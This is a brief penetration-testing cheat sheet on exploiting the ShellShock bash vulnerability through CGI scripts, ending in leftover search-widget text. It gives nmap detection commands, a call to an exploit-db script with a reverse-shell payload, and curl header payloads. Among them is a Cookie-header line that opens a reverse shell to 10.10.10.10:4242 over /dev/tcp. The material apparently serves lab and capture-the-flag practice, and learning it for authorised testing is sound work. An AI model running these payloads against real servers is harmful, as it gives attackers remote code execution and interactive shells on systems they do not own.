ShellShock

Table of content

Description

Iterate the cgi-bin directory agains *.sh, *.pl, *.cgi and *.py.

When one script is found, use the nmap http-shellshock script:

nmap -sV -p- --script http-shellshock <target>
nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls <target>

If vulnerable, it is possible to exploit it :

# https://www.exploit-db.com/exploits/34900

shellshock.py payload=reverse rhost=10.10.10.56 lhost=<LAB IP> lport=<port> pages=/cgi-bin/user.sh

Or manually through curl:

# Reflected
curl -H 'User-Agent: () { :; }; echo "VULNERABLE TO SHELLSHOCK"' http://10.1.2.32/cgi-bin/admin.cgi 2>/dev/null| grep 'VULNERABLE'

# Blind with sleep (you could also make a ping or web request to yourself and monitor that oth tcpdump)
curl -H 'User-Agent: () { :; }; /bin/bash -c "sleep 5"' http://10.11.2.12/cgi-bin/admin.cgi

# Out-Of-Band Use Cookie as alternative to User-Agent
curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http://10.10.10.10/cgi-bin/user.sh

results matching ""

    No results matching ""

    results matching ""

      No results matching ""